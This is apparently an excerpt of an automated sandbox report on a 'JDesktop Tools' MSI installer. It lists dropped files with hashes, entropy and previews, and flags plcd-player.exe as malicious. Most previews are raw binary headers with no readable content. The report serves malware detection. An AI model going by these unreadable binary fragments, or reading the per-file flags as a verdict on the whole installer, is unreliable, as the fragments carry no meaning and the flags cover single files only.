Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........." ..0.............>.... ...@....... ..............................+.....`..................................-..O....@..................H$...`.......,..T............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H.......P .. ...................p,......................................BSJB............v4.0.30319......l...(...#~..........#Strings............#US.........#GUID...........#Blob...........G..........3......................................................................b...+.b.....O.........&.l.......................?....\..................................[.............................................<...................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24200
Entropy (8bit):	6.286319408230414
Encrypted:	false
SSDEEP:	384:PecpB4zReJOVOm9FziUm0exVSiIgm19J8AG4oHHith5kCCeYghu+:3DgeO97m0exVfKwxniQghu+
MD5:	EDCEB39D12707299F6501AE9472A2FD1
SHA1:	F4BE70378AF9FEA7355307CF66E0F5A50590E974
SHA-256:	FA2C262A94F90DAD052A6A5D190F347CD1B8D8BACD7417B8B3FFF56F7D42ECB4
SHA-512:	08406BEDE6C980A1C36EC427C1D86F05F11A41EC366F3821D7B229649B10F3AF9D37AFE7A5A55C7D32D90F0B7D0A43848AF3B20DEA2D2D3669130AAA08729BD2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..U...........!.....:...........X... ...`....... ...............................x....@..................................X..W....`...............B..............\W............................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............@..............@..B.................X......H.......$-..8..................P ......................................\7..4...tTh......A_RF...+X.P.k........_.'....R\|RY.r..d.(...._..h4....sN.:..QU.e...RY..%........(.Y.Kf6.7.w...T..(;._\|n....{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......(......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....*

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	35016
Entropy (8bit):	6.54246973766738
Encrypted:	false
SSDEEP:	384:WL0xHprBefGMOrRQY+hoZhOZkcvr3Eql38WqATrOhEZ0GftpBj1x+ILKHRN7c6lE:NRBefGBkoWjvr0VabKirxmcM+
MD5:	85F6F590B5C4B8C7253E9C403C9BE607
SHA1:	D5A9DB942A50C8821BACD7F6030202C57EC4708B
SHA-256:	D20552FD5C8C8C9759608A84DB1E216DA738F5E9F46DE9E8A3F39A0D6265CB8B
SHA-512:	9C78CB444E28618D44E9DEB23571FC7BBCE268882C2803E0CCC0E84B3E6EAB89C6AF2AAC0D81EF0D2C9FD1E9611CB35334EF3304FB16C5BA0481F6A7273C3660
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.T...........!.....@..........._... ...`....... ....................................`.................................\_..O....`...............J...>..........$^............................................... ............... ..H............text....?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................._......H.......h..../..................P .......................................#..ON.... "J.0..r....6RbR[..44....F.....E.X....1.XIE...:....5.M...Txn.\rycn.....o\|.V}...l}.1En...`.T. \(e .u..=.nA...@p:.(......}....R..r...p.(.....(...+N..r...p.(....(...+R..r...p.(.....(...+Z...r...p.(......(...+Z...r...p.(......(...+..0..$...........(...+..-...........o...........0..............(...+..-.s....z.o.......0..............(...+..-.s....z.o.......0..............(...+..-..*.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\currencysystem4.js Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18727
Entropy (8bit):	5.228912164616093
Encrypted:	false
SSDEEP:	384:vADBz8NWcg8Yt0Mp9sXYGb0JPMfBH1FBIpz4vl:vADBz8NWcg8Y2Mp9sXlb0OfBH1F+pz4t
MD5:	E001FBA3F73ADB83B5B9DCD2A32F1C7B
SHA1:	D0B3A5615F30226072BA90A961DBAD1CE0ED23E2
SHA-256:	60A987CFE5AE817D5D5ED82E1F39C3C537321EE9AB9A0B902DB2990F66B99887
SHA-512:	6DF77E4AC29B0AF120C2EE9380BACD4D1E02C08E9F6E7CD293959F7438294182B773B3C75E0DED111C3EEFD511B09FDF2F43927D68884572F745464705EE81A9
Malicious:	false
Preview:	/...Copyright (C) 1998-2009 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 4.6../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "4.6";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.converterCodeExists = currencySystem_converterCodeExists;...this.converterCodeIsUsed = currencySystem_converterCodeIsUsed;...this.converterUnusedCode = currenc

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\currencysystem5.js Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18850
Entropy (8bit):	5.252718939622608
Encrypted:	false
SSDEEP:	192:LVJMqzg8F9zp/OQMhEF7IXs1NmrgfTPzD5bL29h1FDiTYyf1CQx/TuTmkk6aez4U:LV2Ig8FanXcmrgfTlwOH1ltsz4v8
MD5:	866B6E8A186BE6005A140CFE9F578CD8
SHA1:	E0B2E5344097EF4C1C0A8BE851C5DE27C7F490DB
SHA-256:	0A5731729919FEDC1A3B81C651087AB200C9470FA75A89BEBEA73AE0478F30E5
SHA-512:	BE84B6A9B893DC0D66113287942A388BAFB0629AE67E6C02A8E09E98A028D50CCFA082A2C1B5BFAFA273ACF9E6338E961FA208B62EF6BEE43D8BFD5E6D4619A9
Malicious:	false
Preview:	/...Copyright (C) 1998-2012 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 5.2../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "5.1";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.widgetCurrencyIsListed = currencySystem_widgetCurrencyIsListed;...this.widgetCurrencyIsUsed = currencySystem_widgetCurrencyIsUsed;...this.widgetSuggestUnusedCu

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\currencysystem5.json Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	635
Entropy (8bit):	4.968896753287593
Encrypted:	false
SSDEEP:	12:G3in27KkdcynYKFfaYKQItIl7eTaYKRHTaYKQItI9txrZOaYKB3i8T:G3i27KkdvYKtaYK3qteTaYKRHTaYK3qz
MD5:	D5BE63A1E66E4D6597F49BFD15EB3D83
SHA1:	6B0D0E3101EDB0C92C14691745765DE49CDB7C01
SHA-256:	A1CF701C876F916AACB12A3B952D1D2A38889C2AC118AF9D89493F0A86A45C5D
SHA-512:	6F8CD8F4D18D978F9B30E00322E3CC020B1C3ADD6B6307ED96EBB47B422DD15DDE4BB82698AE755CEF57F8BA3B1BDBD6F47D83CF08471E7B131B8CF8B20ACA55
Malicious:	false
Preview:	{...<currencysystem-insert-header>....."embedLicense": "This service is free to use as long as the banner and link appear on all pages using it. See the Attribution information at currencysystem.com.",..."embedSmallBannerGfx": "https://currencysystem.com/gfx/pub/script-button-88x31.png",..."embedSmallBannerText": "Powered by Currrency System",..."embedSmallBannerLink": "https://currencysystem.com",....."embedSmallHomeGfx": "https://currencysystem.com/gfx/pub/script-icon-16x16.png",..."embedSmallHomeText": "Currrency System Homepage",..."embedSmallHomeLink": "https://currencysystem.com",.....<currencysystem-insert-currencies>..}

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\ecb-eurofxref-daily.xml Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.022779704233175
Encrypted:	false
SSDEEP:	6:TMVBd/5Q3JLHAc4Mj/9mc4C7drcDqhsDgLHLvvssw92PXCEZqilvs/BRi8LqfaR/:TMHduFHjFbdrcDWPu2XCMei8Lqai8L/
MD5:	376F44C2269588374F0F7E876BB3CFFA
SHA1:	1241AC750F7CA447D7A74EB516838C39516AA841
SHA-256:	3B96E197B1A47E7A391385638E13A0CF42E04E1665470A89EABECC67D1B91323
SHA-512:	744C894429453B5E40241FEA6A2EBD354BF2B06C5AD9B4439BE1CCACD15B89C487A1FE100851F23E7A2212CCAC600FC8519224855D7AC72F09E6AABD1E8AC6C9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<gesmes:Envelope xmlns:gesmes="http://www.gesmes.org/xml/2002-08-01" xmlns="http://www.ecb.int/vocabulary/2002-08-01/eurofxref">..<gesmes:subject>Reference rates</gesmes:subject>..<gesmes:Sender>...<gesmes:name>European Central Bank</gesmes:name>..</gesmes:Sender>..<Cube>... currencysystem-insert-->... /currencysystem-insert-->..</Cube>.</gesmes:Envelope>.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\help.chm Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	325845
Entropy (8bit):	7.966997729785747
Encrypted:	false
SSDEEP:	6144:upVysoxdLmULS5Nv5czGT6ozCF6DWc4kYBDrHDDoicYs0meNdts:iAsWJmUSjBczf3c4dHDDoicYs0re
MD5:	DF113262CBB4AD90D0D889620BDEFB06
SHA1:	D94D2111F9FD566941FF96DBA6237D126591E512
SHA-256:	195BAFB549728E15B392B5A2FCBD41003D2472B1AD82AED449175C37E5834657
SHA-512:	B3DDFCCEFFDE24791DFB9587D5AEBC406B9EC3408B38D50C70AC324931C37FD7F55099C7F84B8359A76ACA1BB0E350977451639CC0E61241EBE16D6F4DB90976
Malicious:	false
Preview:	ITSF....`..........g.......\|.{.......".....\|.{......."..`...............x.......T.......................................ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...5.../#ITBITS..../#IVB...Rd./#STRINGS...U.i./#SYSTEM....;./#TOPICS...5.p./#URLSTR...Y.\|./#URLTBL...%.4./#WINDOWS.....L./$FIftiMain...}..8./$OBJINST...>.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...:../$WWKeywordLinks/..../$WWKeywordLinks/Property...6. /about-how-create-a-catalog.html..{.z!/catalog-makers-context-menu.html..u.62/cd-catalog-creator-first-lanche-informations.html..+.[+/checkboxes-options-in-catalog-builder.html...x.../checkboxes_html_117d54ec.png...h.../checkboxes_html_m548d6b7e.png...m.X./checkboxes_html_m59955fe6.png..._.../checkboxes_html_m678cf8a3.png...E.2 /context_menu_html_m6108afb8.png...S.n,/create-order-from-enduser-cd-catalogue.html..A..,/create_a_catalog_related_products_user.html...x.~./how-use-cd-catalog.html

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54224
Entropy (8bit):	6.686697566242328
Encrypted:	false
SSDEEP:	1536:8n6iCEsBHqIXN0llUofqcOZkE5z7L/cLlvBQ+8iAYS:GuEsdXL/cLlGD1
MD5:	249D164D4361F1BBF827331A2C5B8E64
SHA1:	225AE2D2E277B817962D3A65666706BDF7AE6067
SHA-256:	492ADEB85D95834A97FC2C1BD61347202111A3773CE4DE35FC1597C52BE7AAB3
SHA-512:	16B656E17A305503A01C7429EC44DC9DED0DEC39F50844F5CAFF2484AF3F3551F11B620C63111361A5D333AA16A7DB0A2DC7FF5C895AA6C9252F21CA42223A17
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H.....s_..s_..s_..._..s_F.p^..s_F.v^..s_F.w^..s_F.r^..s_..r^..s_.i._..s_..r_a.s_..w^..s_..v^..s_..s^..s_..._..s_..._..s_..q^..s_Rich..s_........PE..L......Z...........!.....r...6.......r.............J................................"...................................................8................)..............T...............................@............................................text....p.......r.................. ..`.rdata...".......$...v..............@..@.data...............................@....rsrc...8...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\lcms-5.0.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.871255823719978
Encrypted:	false
SSDEEP:	98304:vdG+iN2k+e/VO+0X30DQHDbOXh9A0DESaHafv4UZDCr:A+Hk+eX0BHDbOXh9A0DeHfUZDS
MD5:	B6723B31F67956E747493BC64F2C7A59
SHA1:	72389ECF849BFDA364E84258E5857A3DF07E5BFC
SHA-256:	3361AC8727ABA86AC7F3AAC3A214C3CB76F1AF9FF7EE5E94C52C30FDCB7D5064
SHA-512:	E17FEA164BB00E65BE0E58771A728FC9CED5BD65AE2FEC9E55C5697E69A498404B6D52B529DF774012C9F1268D29D97AD3CAFD404BAD58B3C36535A52AB6E09B
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ...A...A...A...9N..A......A......A..4...A..4...A..4...A..4...A..h(...A..4...A...A..C..4...A..G4...A..G4"..A...AJ..A..G4...A..Rich.A..Rich...................PE..L...2.oa...........!.....87.........Py!......P7...............................L......DJ...@.........................P.E.D.....E.......G.H2....................I.,...........................@.B.......B.@............P7..............................text....77......87................. ..`.rdata.......P7......<7.............@..@.data.........F..b....E.............@....rsrc...H2....G..4...DG.............@..@.reloc..,.....I......xI.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1379352
Entropy (8bit):	6.864605291373112
Encrypted:	false
SSDEEP:	24576:Rcbj++KpP3xREx5Fvvr3WH9IYf0mF8wBpoJqzTi1QA96:Rrpi3r3WH9IYf+wBpoJqzTi1QA96
MD5:	7CC7637AB23A01396206E82EF45CDA0E
SHA1:	209CC6CE91E24383213F1C2456D43E48BD09B8C4
SHA-256:	E6C6568A2CD61E401DB4E4F317F139852502EEBB9FE1FBB9C92D7ECFA6524F7F
SHA-512:	E13C48D6CB7B2983221F00C3FDC5DA4221D6B0383F68D74BCAC2AAF95CC7AE702E65DA517AAD51AD7DAD0B672F8436532F4612E7F0853AE0CA924635F3983F6D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..J%..%..%..,......,...>..%......!.....%..0..,......,...$..,...$..,...$..Rich%..................PE..L...<K.V...........!.....L...........u.......`...............................@.....................................0...r...l...x.......0................:.........pb..............................0...@............`..(............................text....J.......L.................. ..`.rdata...V...`...X...P..............@..@.data............t..................@....rsrc...0...........................@..@.reloc..P............"..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ml Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PDF document, version 1.5
Category:	dropped
Size (bytes):	418532
Entropy (8bit):	7.992704655006582
Encrypted:	true
SSDEEP:	12288:gC3QjgVE/DGk/1gsQR4jflsCEqmnUT9ca7cgTe9b:F3m7zqieCU4NlTO
MD5:	EF946663D3A336BDACB512BF32C8F8F2
SHA1:	1A02B2DEE5CD8815BA977A09505F0B38FEA27665
SHA-256:	0B77203265ADCB18A878383978BCE5C8D6A1D253FE1EFC16B8B161B42F03B79F
SHA-512:	B5E45C3F22F31FD1538C982C83F75DA1015FF56235B26EA1707DCA6B1BC1E41FB11557593CED91D5BF927B985511DBA4047C898A1FE9EB7903932FDBF6C85829
Malicious:	false
Preview:	%PDF-1.5.%.....2 0 obj.<<./Type /ObjStm./N 100./First 806./Length 1140 ./Filter /FlateDecode.>>.stream.x.V]o.8.\|....h..H.E...m.P\q.........d.r..fe.n....%...........y.....KB...4....d.....$..$i....P...I9.Z.R....I..%.c.#.eZ.)\|.%.g...0i.Q.........E...&.^c..8..g.N.Y!..W.r... .A...!,.`...........0.......O`B.$.t8X",x=.)..BHi....<.$.x.Lb..2.....L.`.l)r..M....^.R.k....%.n.....^..'`..,...3.@e....P...5.Z..8&....9..j.g....\|.H..P.....".Y..D.z1)...$.c..2.&,.....B..du.....&.....T.7j%..P-..#P/.9(&5g....W..=..f.x.fc...{".8.,.w)....0.\..(.%..1..&.'`v...(g.....r.K....;.y.....n.....S...+z.>{......l+...r.{...#x.8....n....._..........1^...u..X.....n.7.9.1..c...Kz.....2t.rQ7..L.q.I.2{....'z.....=....]9....p.0.....n.vU?n...P....n"<...9).cu>.}_.I.be>4]7........$iN._t...1..........t..2....nG..o)..E..6.........r...se..=...;].vz...4......y...S...E=. aH..zp.tP... .Hu;u.f..?...)L......U.P.y..1\|..\.MH..=...C.....[]s?......h....g.B9../..l....k..1:wE.S.v.:

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3768184
Entropy (8bit):	6.323324235457555
Encrypted:	false
SSDEEP:	49152:mdziNWio/OWFGZ/7pqfwbAFj1IKdn9kvOIBzuJTHPfw8xZcca9KJi4EIdG:sBaNsKKdn9AzBqw8xZcca9KJi4s
MD5:	25DDBD309BB8094229704383977C7268
SHA1:	1574D860469EE784034093199DC9533543E5C096
SHA-256:	8C7E6A620F4BBC343C2695C2E034CC628062B5C2A6B05461FC41B05436F45147
SHA-512:	16CF4205B16F83A3EFEC96660190EFE254919EA18FBC6EB23F45D5C77B0A4A7EFD5DFA36EC1FC43BD79D1D4959A2FA9E172AB842CE7DE754CDC62912752892BA
Malicious:	true
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......N..,..............O.....X..~....X..~....X..~....X..~.......~........e...\..~....\..~....\.#.......K.....\..~....Rich.....`.SH..R.`[RK..RJ.3RK..R.`.SK..RRichJ..R........................PE..L....,oa.............................u............@...........................9.....q.9...@.................................,S1.d.....4..5...........l9.x.....7.............................@.......H...@...............x............................text.............................. ....rdata..B...........................@..@.data....;...p1..(...T1.............@....rsrc....5....4..6...\|4.............@..@.reloc........7.......7.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	349720
Entropy (8bit):	6.600820777591867
Encrypted:	false
SSDEEP:	6144:Nv4Nuw10tGJjPZTbGT/yMzU/RSzBnEywGrfG/ySTJ7a7hNl/K5bv3jgNZuDwsLB+:N4Nuw10tGJjPZTbkyMzU/RSzBnHHrf+0
MD5:	F0AED1A32121A577594ECD66980C3ED3
SHA1:	288954A8D6F48639B7605488D2796B14291507E5
SHA-256:	D02CC01A7D9ADC1E6F980D1A56D6A641DF9E2A63FDC5F007264D1BF59ECC1446
SHA-512:	056670F3074AF5A03326C2BE5FFA0FEC23010DDC25BBED07B295EA3F6C7F8DFBC73E40E11E20103EFEB3B230096F630FB0A3CFA61C4E0A74C15A1CB6319D85D9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r.......r.......r......r......r...s.4.r....\.r.......r......r......r.Rich..r.................PE..L...<K.V...........!.........l.......).......................................p......................................p...9)......<.... ..0................:...0...,..0...............................x{..@............................................text............................... ..`.rdata..............................@..@.data....[.......@..................@....rsrc...0.... ......................@..@.reloc..b3...0...4..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\3e96f3.msi Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {D9FF1A35-78F9-49F0-A6A0-DB3A11387835}, Number of Words: 8, Subject: JDesktop Tools, Author: JDesktop Integration Components (JDIC) Project, Name of Creating Application: Advanced Installer 18.7 build 0a7fdead, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	2233856
Entropy (8bit):	6.540847260876917
Encrypted:	false
SSDEEP:	49152:TDs/YrEUl8VlvfqAE/fQhksQQNgXAo1sVzhly+PkfsJJ10FRzVT8ajBK+ByqV4Tq:GYrEkXAEfs01sVNrajM+
MD5:	9AFC8137B547561655D454AFF862E567
SHA1:	2DAB8B1B9F1AE612E9CD359207751B452C76CB0D
SHA-256:	86747F0567ADBDD895E23E25760AF726A87000BD01EBEF994352EFAD7EB3987C
SHA-512:	91B99B561FBD3C6F3C2583CBF13D9FAF31AAFE6EFDB82667F646AD9F245904D3EF8F37B4CD11E141ECBEBDB7724414E21C4A8F7886CE68FFAC7B0BB8B1B5383B
Malicious:	false
Preview:	......................>...................#...................................I.......v.......................................................................................................................\|...........................................................................................................................................................................................................................................................................................................................c...............%...8........................................................................................... ...!..."...#...$...0.../...'...(...)...*...+...,...-...........6...1...2...3...4...5...9...7...?...C...:...;...<...=...>...B...@...A...K...S...D...E...F...G...H...R.......K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI9CCF.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA23E.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA368.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA463.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	887264
Entropy (8bit):	6.436854443892135
Encrypted:	false
SSDEEP:	24576:gJgZXlAIjfQhETbF+RWQNgXAo1sVz1v0Mny+PkfsJJ10FRzVTv:F/fQhksQQNgXAo1sVzhly+PkfsJJ10FT
MD5:	0BE6E02D01013E6140E38571A4DA2545
SHA1:	9149608D60CA5941010E33E01D4FDC7B6C791BEA
SHA-256:	3C5DB91EF77B947A0924675FC1EC647D6512287AA891040B6ADE3663AA1FD3A3
SHA-512:	F419A5A95F7440623EDB6400F9ADBFB9BA987A65F3B47996A8BB374D89FF53E8638357285485142F76758BFFCB9520771E38E193D89C82C3A9733ED98AE24FCB
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............................4................................................3......3......3.?.....W....3......Rich............................PE..L.....Ia.........."!................................................................KC....@.............................t...d........................p..........T.......p...................@.......h...@............................................text............................... ..`.rdata..............................@..@.data...4...........................@....rsrc................\|..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA5CB.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA6F5.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	587232
Entropy (8bit):	6.421744382064001
Encrypted:	false
